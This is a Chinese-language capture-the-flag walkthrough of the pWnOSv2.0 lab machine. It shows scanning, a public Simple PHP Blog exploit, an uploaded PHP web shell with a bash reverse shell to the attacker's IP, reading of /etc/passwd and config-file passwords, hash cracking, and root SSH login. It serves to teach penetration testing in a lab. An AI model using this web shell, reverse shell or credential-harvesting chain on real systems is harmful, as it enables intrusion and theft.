pWnOSv2.0

主机发现

└─$ sudo nmap -sn 10.10.10.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 06:06 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00037s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00026s latency).
MAC Address: 00:50:56:E3:2D:B4 (VMware)
Nmap scan report for 10.10.10.100
Host is up (0.00029s latency).
MAC Address: 00:0C:29:80:77:B8 (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00016s latency).
MAC Address: 00:50:56:F4:2A:5D (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.04 seconds

端口扫描

└─$ sudo nmap --min-rate 10000 -p- 10.10.10.100 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 06:08 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00086s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:80:77:B8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.32 seconds

TCP

└─$ sudo nmap -sT -sV -sC -O -p22,80 10.10.10.100 -oA nmapscan/detail
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 06:08 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00043s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
|   2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_  256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
|_http-title: Welcome to this Site!
|_http-server-header: Apache/2.2.17 (Ubuntu)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
MAC Address: 00:0C:29:80:77:B8 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.32 - 2.6.39
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.94 seconds

UDP

└─$ sudo nmap -sU -p22,80 10.10.10.100 -oA nmapscan/udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 06:09 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00032s latency).

PORT   STATE  SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:80:77:B8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

Nmap漏洞扫描

└─$ sudo nmap --script=vuln -p22,80 10.10.10.100 -oA nmapscan/vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 06:09 EDT
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.100
Host is up (0.00043s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.100
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://10.10.10.100:80/login.php
|     Form id:
|     Form action: login.php
|
|     Path: http://10.10.10.100:80/register.php
|     Form id:
|_    Form action: register.php
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-cookie-flags:
|   /:
|     PHPSESSID:
|       httponly flag not set
|   /login.php:
|     PHPSESSID:
|       httponly flag not set
|   /login/:
|     PHPSESSID:
|       httponly flag not set
|   /index/:
|     PHPSESSID:
|       httponly flag not set
|   /register/:
|     PHPSESSID:
|_      httponly flag not set
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|   /blog/: Blog
|   /login.php: Possible admin folder
|   /login/: Login page
|   /info.php: Possible information file
|   /icons/: Potentially interesting folder w/ directory listing
|   /includes/: Potentially interesting directory w/ listing on 'apache/2.2.17 (ubuntu)'
|   /index/: Potentially interesting folder
|   /info/: Potentially interesting folder
|_  /register/: Potentially interesting folder
MAC Address: 00:0C:29:80:77:B8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 56.01 seconds

渗透思路

Web渗透

目录爆破

└─$ sudo gobuster dir -u http://10.10.10.100 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/24 06:11:36 Starting gobuster in directory enumeration mode
===============================================================
/register             (Status: 200) [Size: 1562]
/login                (Status: 200) [Size: 1174]
/blog                 (Status: 301) [Size: 311] [--> http://10.10.10.100/blog/]
/includes             (Status: 301) [Size: 315] [--> http://10.10.10.100/includes/]
/info                 (Status: 200) [Size: 49873]
/index                (Status: 200) [Size: 854]
/activate             (Status: 302) [Size: 0] [--> http://10.10.10.100/index.php]
/server-status        (Status: 403) [Size: 293]
===============================================================
2023/07/24 06:11:48 Finished
===============================================================

blog页面如下，看起来像一套内容管理系统

└─$ whatweb http://10.10.10.100/blog
http://10.10.10.100/blog [301 Moved Permanently] Apache[2.2.17], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.2.17 (Ubuntu)], IP[10.10.10.100], RedirectLocation[http://10.10.10.100/blog/], Title[301 Moved Permanently]
http://10.10.10.100/blog/ [200 OK] Apache[2.2.17], Country[RESERVED][ZZ], DublinCore, HTTPServer[Ubuntu Linux][Apache/2.2.17 (Ubuntu)], IP[10.10.10.100], Meta-Author[No Author], MetaGenerator[Simple PHP Blog 0.4.0], PHP[5.3.5-1ubuntu7], PoweredBy[PHP,Plain,Simple], Script[JavaScript], Title[No Title], X-Powered-By[PHP/5.3.5-1ubuntu7]

识别出Simple PHP Blog 0.4.0，查找历史漏洞

└─$ searchsploit Simple PHP Blog 0.4.0
-------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities      | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerab | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote s                                             | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)                         | php/webapps/16883.rb
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/Desktop/pWnOSv2.0]
└─$ searchsploit Simple PHP Blog 0.4.0 -m 1191
[!] Could not find EDB-ID #

[!] Could not find EDB-ID #

[!] Could not find EDB-ID #

[!] Could not find EDB-ID #0

  Exploit: Simple PHP Blog 0.4.0 - Multiple Remote s
      URL: https://www.exploit-db.com/exploits/1191
     Path: /usr/share/exploitdb/exploits/php/webapps/1191.pl
    Codes: OSVDB-19070, CVE-2005-2787, OSVDB-19012, CVE-2005-2733, OSVDB-17779, CVE-2005-2192
 Verified: True
File Type: Perl script text executable
Copied to: /home/kali/Desktop/pWnOSv2.0/1191.pl

用法如下

        Usage   : $0 [-h host] [-e exploit]

                -?      : this menu
                -h      : host
                -e      : exploit
                        (1)     : Upload cmd.php in [site]/https://static.2ephyr.icu/blog/
                        (2)     : Retreive Password file (hash)
                        (3)     : Set New User Name and Password
                                [NOTE - uppercase switches for exploits]
                                -U      : user name
                                -P      : password
                        (4)     : Delete a System File
                                -F      : Path and System File

        Examples: $0 -h 127.0.0.1 -e 2
                  $0 -h 127.0.0.1 -e 3 -U l33t -P l33t
                  $0 -h 127.0.0.1 -e 4 -F ./index.php
                  $0 -h 127.0.0.1 -e 4 -F ../../../etc/passwd
                  $0 -h 127.0.0.1 -e 1

尝试添加一个用户

└─$ perl 1191.pl -h http://10.10.10.100/blog -e 3 -U test -P test
Can't locate Switch.pm in @INC (you may need to install the Switch module) (@INC contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.36.0 /usr/local/share/perl/5.36.0 /usr/lib/x86_64-linux-gnu/perl5/5.36 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl-base /usr/lib/x86_64-linux-gnu/perl/5.36 /usr/share/perl/5.36 /usr/local/lib/site_perl) at 1191.pl line 146.
BEGIN failed--compilation aborted at 1191.pl line 146.

有个报错，少装一个软件

sudo apt install libswitch-perl

验证是否能成功添加用户

perl 1191.pl -h http://10.10.10.100/blog -e 3 -U test -P test
________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                    http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....

Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: test
Password is set to: test

*** Exploit Completed....
Have a nice day! :)

添加成功，尝试登录后台

登录成功，upload image处可上传文件，写个一句话木马尝试上传

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/443 0>&1'"); ?>

上传成功，尝试获得shell

└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.100] 37008
bash: no job control in this shell
www-data@web:/var/www/blog/https://static.2ephyr.icu/blog$ whoami
whoami
www-data
www-data@web:/var/www/blog/https://static.2ephyr.icu/blog$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
www-data@web:/var/www/blog/https://static.2ephyr.icu/blog$ uname -a
uname -a
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
www-data@web:/var/www/blog/https://static.2ephyr.icu/blog$

主机信息收集

www-data@web:/var/www/blog/https://static.2ephyr.icu/blog$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:0:0:MySQL Server,,,:/root:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:104:110::/var/lib/landscape:/bin/false
dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash
www-data@web:/var/www/blog/https://static.2ephyr.icu/blog$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
www-data@web:/var/www/blog/https://static.2ephyr.icu/blog$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

翻一翻有什么文件

www-data@web:/var/www$ ls -liah
ls -liah
total 44K
263594 drwxr-xr-x  4 root root 4.0K May  9  2011 .
261633 drwxr-xr-x 16 root root 4.0K May  7  2011 ..
261763 -rw-r--r--  1 root root 1.4K Mar 24  2008 activate.php
261648 drwxrwxrwx 11 root root 4.0K May  9  2011 blog
261758 drwxr-xr-x  2 root root 4.0K May  7  2011 includes
261764 -rw-r--r--  1 root root  629 May  7  2011 index.php
261765 -rw-r--r--  1 root root   23 Apr  3  2008 info.php
261766 -rw-r--r--  1 root root 3.1K May  7  2011 login.php
261767 -rw-r--r--  1 root root  516 Apr  2  2008 mysqli_connect.php
261768 -rw-r--r--  1 root root 4.6K Apr  2  2008 register.php
www-data@web:/var/www$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>www-data@web:/var/www$

翻到数据库名和密码root:goodday，尝试ssh登录

└─$ ssh root@10.10.10.100
The authenticity of host '10.10.10.100 (10.10.10.100)' can't be established.
ECDSA key fingerprint is SHA256:EWPtTr0Xn9NMudUhcD3+AMXSigXAGS4uldZp3grLm8w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.100' (ECDSA) to the list of known hosts.
root@10.10.10.100's password:
Permission denied, please try again.

失败，尝试登录数据库

www-data@web:/var/www$ mysql -uroot -pgoodday
mysql -uroot -pgoodday
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)

也是失败，不应该，find查找数据库链接文件

www-data@web:/var/www$ find / -name mysqli_connect.php 2>/dev/null
find / -name mysqli_connect.php 2>/dev/null
/var/mysqli_connect.php
/var/www/mysqli_connect.php

www-data@web:/var/www$ cat /var/mysqli_connect.php
cat /var/mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>www-data@web:/var/www$

得到新的数据库名和密码root:root@ISIntS，尝试MySQL登录

www-data@web:/var/www$ mysql -uroot -proot@ISIntS
mysql -uroot -proot@ISIntS
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 43
Server version: 5.1.54-1ubuntu4 (Ubuntu)

Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 license

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

登录成功

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ch16               |
| mysql              |
+--------------------+
3 rows in set (0.00 sec)

mysql> use ch16
use ch16
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------+
| Tables_in_ch16 |
+----------------+
| users          |
+----------------+
1 row in set (0.00 sec)

mysql> select * from users;
select * from users;
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| user_id | first_name | last_name | email            | pass                                     | user_level | active | registration_date   |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
|       1 | Dan        | Privett   | admin@isints.com | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af |          0 | NULL   | 2011-05-07 17:27:01 |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
1 row in set (0.00 sec)

mysql>

尝试破解密码

└─$ hash-identifier 'c2c4b4e51d9e23c02c15702c136c3e950ba9a4af'
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

可能为SHA-1加密，尝试在线破解，结果如下

c2c4b4e51d9e23c02c15702c136c3e950ba9a4af:killerbeesareflying

尝试ssh登录

└─$ ssh dan@10.10.10.100
dan@10.10.10.100's password:
Permission denied, please try again.

登录失败

没试过用root:root@ISIntS登录ssh，看下效果

└─$ ssh root@10.10.10.100
root@10.10.10.100's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)

 * Documentation:  http://www.ubuntu.com/server/doc

  System information as of Mon May 29 15:32:11 EDT 2023

  System load:  0.0               Processes:           82
  Usage of /:   2.9% of 38.64GB   Users logged in:     0
  Memory usage: 31%               IP address for eth0: 10.10.10.100
  Swap usage:   0%

  Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May  9 19:29:03 2011
root@web:~# ls
root@web:~# whoami
root

🐂🍺